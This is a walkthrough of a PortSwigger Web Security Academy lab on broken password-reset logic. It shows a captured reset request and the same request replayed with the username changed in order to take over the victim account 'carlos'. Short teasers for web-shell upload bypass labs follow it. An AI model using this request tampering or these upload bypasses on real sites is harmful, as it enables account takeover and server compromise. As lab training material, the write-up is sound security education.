On this page
Password Reset Broken Logic
Lab
Password reset broken logic · Apprentice
Solution
Given
This lab's password reset functionality is vulnerable. To solve the lab, reset Carlos's password then log in and access his "My account" page.
Your credentials: wiener:peter
Victim's username: carlos
Analyzing the task
The password reset function on the site is vulnerable. We need to reset carlos's password and log into his account.
Recon
Let's see how the password change function works. We reset the password for user wiener. An email arrives with a link:
https://0a95002d04f7b35180b3a379004c0024.web-security-academy.net/forgot-password?temp-forgot-password-token=0umvuzkyx1mfnas8tb890vwj1rjzk1ji
We follow it and land on the password change page. We enter a new password, repeat it. A request flies out:
POST /forgot-password?temp-forgot-password-token=0umvuzkyx1mfnas8tb890vwj1rjzk1ji
Body:
temp-forgot-password-token=0umvuzkyx1mfnas8tb890vwj1rjzk1ji&username=wiener&new-password-1=peter&new-password-2=peter
What if we keep this token but change username, new-password-1, new-password-2?
The request body will look like:
temp-forgot-password-token=0umvuzkyx1mfnas8tb890vwj1rjzk1ji&username=carlos&new-password-1=peter&new-password-2=peter
We send it — success, password changed. We log in as carlos / peter.
Lab solved.
More in this category
Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)
.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.
Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)
Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.
Remote Code Execution via Web Shell Upload (PortSwigger Lab)
Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.